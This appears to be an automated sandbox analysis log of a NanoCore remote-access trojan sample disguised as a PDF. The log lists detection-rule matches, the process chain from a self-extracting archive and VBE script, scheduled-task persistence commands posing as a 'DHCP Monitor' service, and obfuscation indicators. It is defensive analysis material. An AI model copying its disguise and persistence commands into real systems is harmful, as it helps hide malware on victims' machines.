      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EF5F0 appears 31 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EEC50 appears 56 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EEB78 appears 39 times
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: String function: 00BC0DC0 appears 38 times
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: String function: 00BBFD60 appears 39 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGDWsrap.exe@ vs 004349256789197.pdf.scr.exe
      Source: 004349256789197.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@43/45@28/1
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile read: C:\Windows\win.iniJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D6C74 GetLastError,FormatMessageW,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
      Source: 004349256789197.pdf.scr.exeReversingLabs: Detection: 44%
      Source: 004349256789197.pdf.scr.exeVirustotal: Detection: 39%
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile read: C:\Users\user\Desktop\004349256789197.pdf.scr.exeJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\004349256789197.pdf.scr.exe C:\Users\user\Desktop\004349256789197.pdf.scr.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\temp\Folder10_51Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C24089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C2AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3956:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: sfxname
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: sfxstime
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: STARTDLG
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: xzB
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile written: C:\Users\user\AppData\Local\Temp\Folder10_51\wfccrina.iniJump to behavior
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: 004349256789197.pdf.scr.exeStatic file information: File size 1181640 > 1048576
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 004349256789197.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF640 push ecx; ret
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EEB78 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C362CC pushad ; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BF0332 push edi; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC0E06 push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
      Source: 004349256789197.pdf.scr.exeStatic PE information: section name: .didat
      Source: ihgsvw.exe.0.drStatic PE information: real checksum: 0x15a0e8 should be: 0x1560ce
      Source: 004349256789197.pdf.scr.exeStatic PE information: real checksum: 0x0 should be: 0x12da1b
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder10_51\__tmp_rar_sfx_access_check_3874750Jump to behavior
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
